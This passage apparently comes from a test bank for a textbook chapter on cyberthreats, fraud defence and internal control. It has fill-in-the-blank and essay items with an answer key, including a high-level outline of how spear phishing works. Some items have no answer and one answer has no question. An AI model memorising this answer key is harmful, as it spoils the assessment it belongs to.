Answer: Time-to-exploitation
Difficulty: Hard
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
17. Malware infected computers can be organized into networks called ________.
Answer: Botnets
Difficulty: Easy
Section Ref: 5.2 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
19. When it comes to reducing employee fraud, regulators look favorably on companies that can
demonstrate good __________ and best practice operational risk management.
20. _____________detection identifies things like excessive hours worked, unusual transactions,
copying of huge amounts of data and other unusual patterns of behavior, and uses them to
alert IT managers to the possibility of internal fraud.
Answer: Anomaly
Difficulty: Hard
Section Ref: 5.4 Defending Against Fraud
AACSB: Use of Information Technology
41
21. The SEC and FTC impose huge fines for __________ in order to deter companies from
under-investing in data protection.
23. __________ is a process designed to achieve reliable financial reporting in order to protect
investors and comply with regulations.
24. __________ controls can verify a user’s identity, which creates the problem of privacy
invasion.
Answer: Biometric
Difficulty: Medium
Section Ref: 5.5 Compliance and Internal Control
AACSB: Use of Information Technology
25. A __________ estimates the consequences of disruption of a business function and collects
data to develop recovery strategies.
42
Essay Questions
1. Define social engineering. Describe two ways in which social engineering could be used to
obtain credentials from a user in order to gain access to an account or network.
Answer:
Social engineering tactics are used by hackers and corporate spies to trick people into revealing
login information or access codes.
Answers to the second question will vary. For example, students could describe phishing tactics
or other methods to motivate users to click a link or download an app that is infected.
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
2. Why are internal threats a major challenge for organizations? How can internal threats be
minimized?
Answer:
Threats from employees, referred to as internal threats, are a major challenge largely due to the
many ways an employee can carry out malicious activity. Insiders may be able to bypass
physical security (e.g., locked doors) and technical security (e.g., passwords) measures that
organizations have in place to prevent unauthorized access. Why? Because defenses such as
firewalls, intrusion detection systems (IDS), and locked doors mostly protect against external
threats.
Insider incidents can be minimized with a layered defense strategy consisting of security
procedures, acceptable use policies, and technology controls.
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
Answer:
Spear phishers often target select groups of people with something in common—they work at the
same company, bank at the same financial institution, or attend the same university. The scam e-
mails appear to be sent from organizations or people the potential victims normally receive e-
mails from, making them even more deceptive.
Here is how spear phishing works:
43
1. Spear phish creators gather information about people’s companies and jobs from social
media or steal it from computers and mobile devices. Then they use the information to
customize messages that trick users into opening an infected e-mail.
2. Then they send e-mails that look like the real thing to targeted victims, offering all sorts of
urgent and legitimate-sounding explanations as to why they need your personal data.
3. Finally, the victims are asked to click on a link inside the e-mail that takes them to a phony
but realistic-looking website, where they are asked to provide passwords, account numbers,
user IDs, access codes, PINs, and so on.
Difficulty: Hard
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
4. Discuss how social networks and cloud computing increase IT security risks. How do you
recommend that the risks be reduced?
Answer:
Difficulty: Medium
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
44
5. Explain internal fraud. Describe the most effective approach to preventing it.
Answer:
Internal fraud refers to the deliberate misuse of the assets of one’s employer for personal gain.
Internal audits and internal controls are essential to the prevention and detection of occupation
frauds.
The single-most-effective fraud prevention technique is the perception of detection and
punishment. If a company shows its employees that it can find out everything that every
employee does and will prosecute to the fullest extent anyone who commits fraud, then the
feeling that “I can get away with it” drops drastically. In addition, companies may use a
combination of defenses including intelligent analysis, audit trails, and anomaly detection.
Difficulty: Hard
Section Ref: 5.4 Defending Against Fraud
AACSB: Use of Information Technology
45